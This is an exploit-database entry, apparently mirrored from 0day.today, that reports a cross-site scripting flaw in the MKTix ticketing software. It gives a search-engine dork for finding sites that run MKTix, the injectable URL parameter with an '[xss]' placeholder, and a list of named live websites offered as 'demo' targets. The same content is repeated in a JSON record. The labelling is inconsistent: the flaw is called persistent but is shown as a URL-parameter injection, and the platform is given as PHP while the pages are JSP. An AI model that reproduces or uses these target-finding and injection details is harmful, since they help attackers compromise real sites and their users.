Search...

MKTix XSS Presistent Vulnerability

2012-05-19T00:00:00

ID 1337DAY-ID-18304
Type zdt
Reporter Angel Injection
Modified 2012-05-19T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Angel Injection member from Inj3ct0r Team          1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] MKTix XSS Presistent Vulnerability
[-] Found by Angel Injection
[-] Link: www.mktix.com
[-] Security -::RISK: High
[-] http://1337day.com http://r00tw0rm.com http://i313.cc
[-] Greetz to 1337day.com(r0073r) Team i313.cc(Hussain) Team r00tw0rm (CrosS) Team

dork: intext:" Powered by MKTix"

exploit
http://server/mktixrun/shared/mknporun?dir=mvedc&page=mkeventlistfrm.jsp&Type=[xss]

DEMO SITES
http://www.mvarts.info/mktixrun/shared/mknporun?dir=mvedc&page=mkeventlistfrm.jsp&Type=[xss]
https://prod.mkat.com/mktixrun/shared/mknporun?dir=mvedc&page=mkeventlistfrm.jsp&Type=[xss]
http://www.mktix.com/mktixrun/shared/mknporun?dir=mvedc&page=mkeventlistfrm.jsp&Type=[xss]
http://www.mktix.com/mktixrun/shared/mknporun?dir=mvedc&page=mkeventlistfrm.jsp&Type=[xss]



#  0day.today [2018-04-13]  #

JSON Vulners Source

Initial Source

{"published": "2012-05-19T00:00:00", "id": "1337DAY-ID-18304", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for php platform in category web applications", "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2018-04-13T03:43:01", "rev": 2}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:18304"]}], "modified": "2018-04-13T03:43:01", "rev": 2}, "vulnersScore": 0.3}, "type": "zdt", "lastseen": "2018-04-13T03:43:01", "edition": 2, "title": "MKTix XSS Presistent Vulnerability", "href": "https://0day.today/exploit/description/18304", "modified": "2012-05-19T00:00:00", "bulletinFamily": "exploit", "viewCount": 8, "cvelist": [], "sourceHref": "https://0day.today/exploit/18304", "references": [], "reporter": "Angel Injection", "sourceData": "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : 1337day.com 0\r\n1 [+] Support e-mail : submit[at]1337day.com 1\r\n0 0\r\n1 ######################################### 1\r\n0 I'm Angel Injection member from Inj3ct0r Team 1\r\n1 ######################################### 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n[+] MKTix XSS Presistent Vulnerability\r\n[-] Found by Angel Injection\r\n[-] Link: www.mktix.com\r\n[-] Security -::RISK: High\r\n[-] http://1337day.com http://r00tw0rm.com http://i313.cc\r\n[-] Greetz to 1337day.com(r0073r) Team i313.cc(Hussain) Team r00tw0rm (CrosS) Team\r\n\r\ndork: intext:\" Powered by MKTix\"\r\n\r\nexploit\r\nhttp://server/mktixrun/shared/mknporun?dir=mvedc&page=mkeventlistfrm.jsp&Type=[xss]\r\n\r\nDEMO SITES\r\nhttp://www.mvarts.info/mktixrun/shared/mknporun?dir=mvedc&page=mkeventlistfrm.jsp&Type=[xss]\r\nhttps://prod.mkat.com/mktixrun/shared/mknporun?dir=mvedc&page=mkeventlistfrm.jsp&Type=[xss]\r\nhttp://www.mktix.com/mktixrun/shared/mknporun?dir=mvedc&page=mkeventlistfrm.jsp&Type=[xss]\r\nhttp://www.mktix.com/mktixrun/shared/mknporun?dir=mvedc&page=mkeventlistfrm.jsp&Type=[xss]\r\n\r\n\n\n# 0day.today [2018-04-13] #"}